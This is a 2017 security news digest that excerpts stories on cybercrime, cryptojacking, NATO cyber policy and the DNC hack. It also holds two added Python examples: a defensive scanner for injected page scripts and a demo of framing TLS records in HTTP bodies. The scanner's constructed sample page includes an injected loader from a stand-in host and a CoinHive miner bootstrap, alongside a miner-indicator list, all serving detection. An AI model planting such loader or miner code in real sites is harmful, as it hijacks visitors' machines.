IT Security News Blast 11-09-2017

Daily IT News: Why firewalls don't work

Fast-growing cyber crime threatens financial sector: Europol
Online criminals have become so sophisticated that gangs have created “conglomerations” with company structures that specialize in different criminal activities to carry out the attacks, Rob Wainwright, who leads the EU law enforcement agency, said. “What really concerns me is the sophistication of the capability, which is becoming good enough to really threaten parts of our critical infrastructure, certainly in the financial, banking sector,” he told Reuters.
https://www.reuters.com/article/us-portugal-websummit-europol/fast-growing-cyber-crime-threatens-financial-sector-europol-idUSKBN1D82QS

 

Poll: Americans more worried about cyber crimes than other crimes
The survey found 67 percent of adults worry at least occasionally about computer hackers stealing their personal or financial information and 66 percent are concerned about being a victim of identity theft. The gap between fear of cyber crimes and the next most pressing concern — having your car stolen or broken into — was 28 percentage points. The question about hackers stealing information, which took the top spot, was added this year.
http://thehill.com/homenews/news/358912-poll-americans-more-worried-about-cybercrimes-than-other-crimes

 

Cyber experts say threats to satellites are legion
Lisa Donnan, managing director of Option3Ventures, a venture capital firm focused on information security and analytics companies, said conversations with chief security officers (CSOs) have shifted from defense to damage control given the magnitude of cyber attacks. “When the average breach has been there for 221 days — on average — the game’s over,” she said. “When you speak to seasoned CSOs, their mindset is much more in resiliency and recovery, because they’ve lost the war.”
http://spacenews.com/cyber-experts-say-threats-to-satellites-are-legion/

 

Why walls don’t work – the CISO revolution
When speaking with CISOs, the top four motivators we identified for increased investment in detection were cited as growth of mobile (41 per cent) and cloud service usage (41 per cent), the risk of a data breach (40 per cent), and the introduction of connected devices and IoT (37 per cent). As a result, nearly a quarter (23 per cent) of large organisations plan to implement detection technology in the near future.
https://www.itproportal.com/features/why-walls-dont-work-the-ciso-revolution/

 

Hacking medical devices is the next big security concern
The problem is widespread, it seems. Earlier this year, security firm Trend Micro conducted a study using Shodan, a search engine that indexes internet-connected devices, and found over 100,000 records relating to medical equipment and hospital computers worldwide that are openly exposed and potentially vulnerable to attack. […] Hackers are still one step behind on launching the kinds of sophisticated attack that would be needed to threaten patient health and hold hospitals to ransom, she says. But, she adds, “If I had to go into hospital, I’d still be very concerned.”
https://www.ft.com/content/75912040-98ad-11e7-8c5c-c8d8fa6961bb

 

Tactical cybersecurity: Military war-gaming comes to healthcare
“Healthcare organizations should create realistic scenarios using the typical threat actors seen in this sector,” she advised. “By discussing the issues on a generic healthcare network using common defense tools in the industry, the participants can work out the challenges they are seeing and discuss what is working or not, without the fear of releasing sensitive information.”
http://www.healthcareitnews.com/news/tactical-cybersecurity-military-war-gaming-comes-healthcare

 

Cost of cyber crime rises rapidly as attacks increase
Good detection matters: the faster a breach can be identified and contained, the lower the cost. Having an incident response team, participating in threat sharing with other companies and using security analytics can help lower the cost of data breach, according to Ponemon. The cost of a data breach increases if it involves a third party, if the company has extensive migration to the cloud and extensive use of mobile platforms, according to the report.
https://www.ft.com/content/56dae748-af79-11e7-8076-0a4bdda92ca2

 

IoT is Insecure, Get Over It! Say Researchers
“We write code and we are not perfect. The problem is, great security is expensive. You can’t just keep looking for vulnerabilities. You need to ship product and accept the fact you can’t solve security,” said Miller, who, along with Valasek, is a principal autonomous vehicle security architect at GM’s Cruise Automation. The comments were made during a keynote at Black Duck Software’s Flight 2017 conference.
https://threatpost.com/iot-is-insecure-get-over-it-say-researchers/128826/

 

NATO to Boost Command Sites, Cyber Policy With Eye on Russia
At a meeting on Wednesday in Brussels, the ministers also decided to integrate cyber into all NATO operations. The step puts this area on par with the alliance’s traditional domains of air, land and sea. It’s consistent with a 2014 decision by NATO to broaden the scope of its collective-defense commitment to cover cyber attacks. […] The policy revamp highlights two fronts beyond terrorism on which western defense planners are active: the re-emergence of conventional military threats and the risk of hybrid warfare including cyber attacks. In both cases, Russia is on NATO’s radar screen.
https://www.bloomberg.com/news/articles/2017-11-08/nato-to-boost-command-structure-cyber-policy-with-eye-on-russia

 

He Solved The DNC Hack. Now He’s Telling His Story For The First Time.
Johnston told them that their computer systems had been fully compromised — not just by one attack, but by two. Malware from the first attack had been festering in the DNC’s system for a whole year. The second infiltration was only a couple of months old. Both sets of malware were associated with Russian intelligence. Most disturbing: The hackers had been gathering copies of all emails and sending them out to someone, somewhere. Every single email that every DNC staffer typed had been spied on. Every word, every joke, every syllable.
https://www.buzzfeed.com/jasonleopold/he-solved-the-dnc-hack-now-hes-telling-his-story-for-the?utm_term=.naBopyv3Vm#.jkG9rpvn5O

 

How To Profit From The $6 Trillion A Year Cyber Crime Threat
Cybercrime attacks are expected to cost us $6 trillion a year by 2021. In a single year, cyber terrorism could cost us three times more than the entire U.S. housing and real estate industry is currently worth. The Chairman of IBM calls it the “greatest threat to every profession, every industry, every company in the world”. Cisco cites a report saying it will be more profitable than the global trade of all major illegal drugs combined. AT&T calls it the greatest transfer of economic wealth in history. The response? A desperate scramble to ramp up spending to protect their businesses, and another massive opportunity for investors.
https://www.nextbigfuture.com/2017/11/how-to-profit-from-the-6-trillion-a-year-cyber-crime-threat.html

 

Where hackers haven’t directly influenced polls, they’ve undermined our faith in democracy
The problem with digital systems is the overarching fear that everything could be blown up in one act of hacker spite. This is compounded by the fact that we don’t know what we don’t know. A further issue with the DREs in Virginia and elsewhere is that they produce no paper trail. They have no vote-auditing capability. We are assured that they have never been hacked but if they were, how would we tell? The real enemy in this is official complacency.
https://www.theregister.co.uk/2017/11/08/hacking_democracy/

 

U.S. House panel advances bill aimed at limiting NSA spying program
The House Judiciary Committee voted 27-8 to approve the bill, which would partially restrict the U.S. government’s ability to review American data collected under the foreign intelligence program by requiring a warrant in some cases. Lawmakers in both parties were sharply divided over whether the compromise proposal to amend what is known as Section 702 of the Foreign Intelligence Surveillance Act would enshrine sufficient privacy protections or possibly grant broader legal protections for the NSA’s surveillance regime.
https://www.reuters.com/article/us-usa-cyber-surveillance/u-s-house-panel-advances-bill-aimed-at-limiting-nsa-spying-program-idUSKBN1D82YG

 

World’s First Blockchain-Based Privacy App Starts Pre-Token Sale
All files and communications are encrypted in the senders’ browser before they are sent to the servers and stored in a decentralized storage area. Decryption of data is only possible in the browser of the intended recipients. All communications and data are encrypted on all devices. FortKnoxster users can communicate privately and safely, be it through inbox, chat, phone or video calls, file-storage etc. – eliminating the risk of hacks, cyber-threats and centralized government surveillance.
https://cointelegraph.com/press-releases/worlds-first-blockchain-based-privacy-app-starts-pre-token-sale

 

Digitization Spurs Port Security Spending
Frost & Sullivan’s report focuses on the land-side security of ports including surveillance, perimeter security, command and control, cybersecurity, screening and detection. Digitization of port operations, both for efficiency and capacity expansion, and new infrastructure will be drivers of such security spending, the report found. Developing innovative cyber-resilient technologies that monitor constantly evolving cyber threats was one of four “strategic imperatives” for industry.
https://www.porttechnology.org/news/digitization_spurs_port_security_spending

 

Experts Raise Concerns Over Government Mobile Data Grab
Security experts have raised question marks over possible plans to use mobile phone data to help complete the UK national census after 2021. It was revealed this week that the Office of National Statistics (ONS) has been tracking the anonymized movements of thousands of adults in London to study commuter patterns. It’s part of the Administrative Data Census Project, an ONS initiative designed to work out whether the government can meet its stated ambition that “censuses after 2021 will be conducted using other sources of data.”
https://www.infosecurity-magazine.com/news/experts-concerns-government-mobile/

 

Women in Cybersecurity: Things are changing… slowly
Overall, while women do represent a minority of those attending, the trends are positive. SINET events have seen conference attendance by women go from 13 percent in 2007 to nearly 20 percent this year. A spot-check of numbers from some of the events held during the 10-year period indicated the increase was a gradual curve. This wasn’t a scientific survey by any means, but the numbers do support the empirical observation that things are changing in a positive direction, albeit slowly.
https://www.scmagazine.com/women-in-cybersecurity-things-are-changing-slowly/article/700191/

 

Cryptojacking craze that drains your CPU now done by 2,500 sites
Willem de Groot, an independent security researcher who reported the findings Tuesday, told Ars that he believes all of the 2,496 sites he tracked are running out-of-date software with known security vulnerabilities that have been exploited to give attackers control. Attackers, he said, then used their access to add code that surreptitiously harnesses the CPUs and electricity of visitors to generate the digital currency known as Monero. About 80 percent of those sites, he added, also contain other types of malware that can steal visitors’ payment card details.
https://arstechnica.com/information-technology/2017/11/drive-by-cryptomining-that-drains-cpus-picks-up-steam-with-aid-of-2500-sites/
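The attack above works because the attacker could add script to pages the site owner already trusts. A static check of your own pages for unexpected script is one cheap way to notice that. The following is an added example written for this digest, not code from the Ars article or from de Groot; the allowlist of script hosts, the sample page and the miner indicator strings (Coinhive-style API names) are constructed assumptions that an operator would replace with their own.

```python
"""Flag script tags on a page that a site owner did not put there.

Two checks: external <script src> from a host outside an allowlist, and
inline script text containing tokens typical of browser miners. Both lists
are assumptions for illustration; tune them for a real site.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed indicators of an in-browser Monero miner; a real list would be
# maintained from current samples, not hard-coded.
MINER_INDICATORS = ("coinhive", "cryptonight", "miner.start", ".anonymous(")


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of src= on <script> tags
        self.inline = []        # text of <script> blocks without src=
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def scan_page(html, allowed_hosts):
    """Return a list of (finding_type, detail) for suspicious script."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        # urlparse handles absolute and protocol-relative (//host/x.js) URLs;
        # a same-origin relative path has an empty netloc and is skipped.
        host = urlparse(src).netloc.lower()
        if host and host not in allowed_hosts:
            findings.append(("external-script", src))
    for text in parser.inline:
        low = text.lower()
        hits = [tok for tok in MINER_INDICATORS if tok in low]
        if hits:
            findings.append(("inline-indicator", ",".join(hits)))
    return findings


# Constructed sample page: one legitimate script, one injected loader and
# one injected inline miner bootstrap. Not captured from a real site.
SAMPLE_PAGE = """<html><head>
<script src="/static/shop.js"></script>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="//evil-cdn.example/lib/miner.min.js"></script>
<script>
  var m = new CoinHive.Anonymous('SITEKEY', {throttle: 0.3});
  m.start();
</script>
</head><body>shop</body></html>"""

ALLOWED_HOSTS = {"cdn.shop.example"}

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_PAGE, ALLOWED_HOSTS):
        print(kind, detail)
```

Run against a crawl of your own site on a schedule and diff the output; a new external host or a new inline hit is the signal that something was added after the site was last reviewed. The check is deliberately static and offline, so it will not catch a miner pulled in at runtime by an already-allowed script; for that you need a browser-side or CPU-usage check.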

 

Malwarebytes is tracking missed detections in traditional antivirus
Tracking real-world scans on systems over the first six months of 2017, Malwarebytes says that typical desktop antivirus solutions aren’t cutting it. The company examined detection data from nearly 10 million endpoints, and discovered some of the most notable names in the anti-virus industry – even those who rank high in lab testing – are missing basic threats completely.
https://www.csoonline.com/article/3236254/security/malwarebytes-tracking-missed-detections-in-traditional-anti-virus.html

 

SSL spy boxes on your network getting you down? But wait, here’s an IETF draft to fix that
The working draft from three Cisco employees notes that so-called middleboxes – which intercept and decrypt connections – are often deployed to scrutinize and improve network security, but can end up breaking application services by terminating TLS connections. Middleboxes can also be used by organizations and ISPs to monitor employees and citizens. As such, the proposed new standard would lift the TLS handshake further up the OSI stack to the application layer by transporting TLS records in HTTP message bodies. They’re calling it “Application Layer TLS” or ATLS (TLS is the successor to SSL).
https://www.theregister.co.uk/2017/11/08/ietf_drafts_middlebox_security_workaround/
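To make the framing idea concrete: carrying TLS records in HTTP bodies means the record layer is parsed by the application, while anything on the path sees only an HTTP POST. The following is an added example written for this digest, not the draft's reference implementation or Cisco code; the `/atls` path, the `application/octet-stream` content type and the constructed ClientHello record are assumptions. It omits the session-correlation the real draft needs across several POSTs.

```python
"""Frame TLS records inside HTTP message bodies and parse them back out.

Shows the layering the ATLS draft proposes: the TLS record header
(type, version, length) is read by the endpoint after the HTTP body is
extracted, not by a box terminating TCP on the path.
"""
import struct

TLS_RECORD_HEADER_LEN = 5
TLS_HANDSHAKE = 0x16
CONTENT_TYPES = {0x14: "change_cipher_spec", 0x15: "alert",
                 0x16: "handshake", 0x17: "application_data"}
MAX_RECORD_LEN = 2 ** 14 + 256   # TLSCiphertext upper bound


def parse_tls_records(data):
    """Split bytes into (content_type, (major, minor), payload) records.

    Truncated or malformed input raises ValueError instead of being
    silently skipped: once the middlebox is gone, this is the endpoint's
    own job."""
    records = []
    offset = 0
    while offset < len(data):
        if len(data) - offset < TLS_RECORD_HEADER_LEN:
            raise ValueError("truncated record header")
        ctype, major, minor, length = struct.unpack(
            "!BBBH", data[offset:offset + TLS_RECORD_HEADER_LEN])
        if ctype not in CONTENT_TYPES:
            raise ValueError("unknown content type 0x%02x" % ctype)
        if length > MAX_RECORD_LEN:
            raise ValueError("record too large")
        start = offset + TLS_RECORD_HEADER_LEN
        body = data[start:start + length]
        if len(body) != length:
            raise ValueError("truncated record body")
        records.append((ctype, (major, minor), body))
        offset = start + length
    return records


def wrap_in_http_request(records, path="/atls", host="server.example"):
    """Put raw TLS records into the body of an HTTP/1.1 POST (assumed path)."""
    head = ("POST %s HTTP/1.1\r\n"
            "Host: %s\r\n"
            "Content-Type: application/octet-stream\r\n"
            "Content-Length: %d\r\n\r\n" % (path, host, len(records)))
    return head.encode("ascii") + records


def unwrap_http_body(message):
    """Return the body of an HTTP message, checking Content-Length."""
    head, sep, body = message.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    content_length = None
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            content_length = int(value.strip())
    if content_length is None or len(body) != content_length:
        raise ValueError("bad or missing Content-Length")
    return body


def middlebox_view(message):
    """What an HTTP-aware box on the path sees without parsing the body."""
    head = message.split(b"\r\n\r\n", 1)[0].decode("ascii")
    lines = head.split("\r\n")
    return {"request": lines[0],
            "headers": dict(l.split(": ", 1) for l in lines[1:])}


def build_client_hello():
    """Constructed, minimal TLS 1.2 ClientHello record (fixed 'random')."""
    body = (b"\x03\x03"                  # client_version
            + bytes(range(32))           # random: constructed, not random
            + b"\x00"                    # session_id length 0
            + b"\x00\x02\xc0\x2f"        # one cipher suite
            + b"\x01\x00"                # one compression method: null
            + b"\x00\x00")               # extensions length 0
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body  # type client_hello
    return struct.pack("!BBBH", TLS_HANDSHAKE, 3, 1, len(handshake)) + handshake


if __name__ == "__main__":
    msg = wrap_in_http_request(build_client_hello())
    print(middlebox_view(msg))
    for ctype, ver, payload in parse_tls_records(unwrap_http_body(msg)):
        print(CONTENT_TYPES[ctype], ver, len(payload), "bytes")
```

The point of `middlebox_view` is that the path sees a request line and headers, not a TLS handshake, so a TLS-intercepting proxy has nothing to terminate; the flip side, which the draft does not remove, is that a box willing to parse HTTP bodies can still find the records.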

 
====

Critical Informatics and the Critical Informatics logo are the trademarks of Critical Informatics, Inc. All other brand names, trademarks, service marks and copyrights are the property of their respective owners.  © 2017 Critical Informatics, Inc. All rights reserved.